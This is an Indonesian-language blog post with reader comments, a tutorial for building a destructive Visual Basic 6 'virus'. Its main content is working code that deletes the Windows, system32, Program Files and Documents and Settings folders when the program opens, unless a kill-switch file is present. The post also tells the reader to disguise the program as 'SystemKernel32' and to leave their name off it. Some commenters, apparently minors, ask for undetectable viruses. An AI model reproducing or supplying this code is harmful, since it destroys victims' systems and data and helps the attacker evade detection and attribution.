Another Tutorial Cara Membuat Virus

Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

—- more —-

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32?)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32? jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

6 Responses to “Another Tutorial Cara Membuat Virus”

  1. thanks, tp gimana cara ngompile nya

  2. o iya
    ana lupa
    ana blm minat ma virus
    jd masih buta ma ginian
    coba lo copas dolo ke notepad trus lo tanya ma yang tw
    sumpah ana lupa

  3. hallo, aku pengen bisa membuat virus pake notepad yang mematikan dan tidak terdeteksi oleh anti virus

  4. hall, gue pengen bisa membuat virus yang tidak terdeteksi kalau ada tolong masuk aja je E-mail gue di tunggu laporannya ya master vir

  5. noteped tu apaan ga ngerti (masi bocah)

  6. codenya apa bingung

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: